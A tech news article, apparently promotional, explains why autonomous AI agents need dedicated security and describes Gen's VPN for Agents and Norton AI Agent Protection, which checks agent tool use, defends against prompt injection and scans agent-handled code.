MilikMilik

Why AI Agents Need Their Own Security Layer—and How Norton 360 Is Responding

Why AI Agents Need Their Own Security Layer—and How Norton 360 Is Responding

From Helpful Assistants to High-Risk Operators

AI agents are rapidly evolving from simple chatbots into autonomous systems that read emails, manage financial workflows, execute code and log into sensitive online accounts. This shift dramatically changes the threat landscape. Instead of just securing a user’s device or browser session, defenders now have to consider how software agents act on their own, often across multiple services and tools at once. These agents can be misled by malicious prompts, steered to unsafe websites, or granted more access than their human owners realize. When an AI system can send messages, move money or deploy code without direct oversight, any compromise of its logic or connections turns into a powerful attack vector. This emerging reality is creating a distinct category of risk—AI agent security—that traditional consumer protection products, originally built for human-controlled devices and identities, were never designed to handle.

Why Autonomous AI Vulnerabilities Demand a New Security Layer

The most serious autonomous AI vulnerabilities arise from the gap between what users intend and what agents actually do. Agents can chain tools, plugins and data sources together at machine speed, magnifying the impact of a single malicious instruction or compromised resource. Prompt injection attacks can subtly rewrite an agent’s priorities, while unsafe code, files or third-party tools can slip into workflows if no one is watching. Because these systems make decisions without constant human review, unsafe actions—like connecting to hostile domains or running hidden scripts—can execute before a user notices anything is wrong. Existing security stacks focus on device, network and identity, but lack a dedicated control point for agent behavior. A new security layer is needed that understands how agents operate, inspects their choices in real time and can intervene between an AI-generated decision and its execution.

VPN for AI Agents: Isolating Traffic and Shielding Identity

Gen’s new VPN for Agents tackles a problem traditional VPNs were never built to solve: separating human activity from AI agent activity. Instead of simply encrypting a device’s internet connection, this VPN is designed specifically for autonomous agents that may operate continuously, across many services and geographies. It uses multi-tunnel technology so agents can work from different virtual locations at the same time, supporting complex workflows without exposing real identity or physical location. By shielding identity and location details, it reduces profiling and tracking risks that could help attackers target or manipulate an agent’s environment. Crucially, it also allows more granular control over where agents connect and what they are allowed to access, forming a dedicated network security perimeter for software agents. Because it is delivered without client setup or software downloads, it can be integrated into AI-powered workflows without adding friction for end users.

Norton 360 AI Protection: A Guardrail Between Decision and Action

Norton AI Agent Protection extends Norton 360 beyond devices and into the heart of AI workflows. Built directly into the consumer security suite, it monitors supported AI agents—such as those using tools like Claude Code, Cursor and OpenClaw—to see what they do and where they connect. Its core value lies in intervening between an agent’s decision and its execution. The system introduces checks before plugins, skills and tools are invoked, helping ensure agents only use resources that meet security and trust standards. It also adds defences against prompt injection, a growing attack technique where adversaries smuggle malicious instructions into content the agent processes. In parallel, Norton AI Agent Protection scans code and files that agents access or generate, blocking malware and unsafe scripts before they run. Together, these capabilities act as an AI-centric trust layer, adding behavior-aware guardrails that traditional endpoint or network protections lack.

Enterprise-Scale Adoption, Consumer-Grade Risk—and the Road Ahead

AI agents are moving into mainstream use faster than security infrastructure can adapt, both in enterprises and in everyday consumer tools. Organisations and individuals are starting to let agents manage accounts, process documents and interact with online services, but many still rely on security models built for human users. Gen’s Agent Trust Hub represents one of the first attempts to formalise a dedicated trust framework for AI agents, combining verification, detection and communication security in a single control point. Developed jointly by Gen Threat Labs and Gen AI Foundry, this framework reflects a broader market realization: AI agents are not just another app feature, but a new class of software that requires separate policies, monitoring and controls. As autonomous capabilities expand, security teams will need to treat agents as their own endpoints—complete with tailored protections like VPN for AI agents and Norton 360 AI protection—to keep autonomy from turning into liability.

Comments
Say Something...
No comments yet. Be the first to share your thoughts!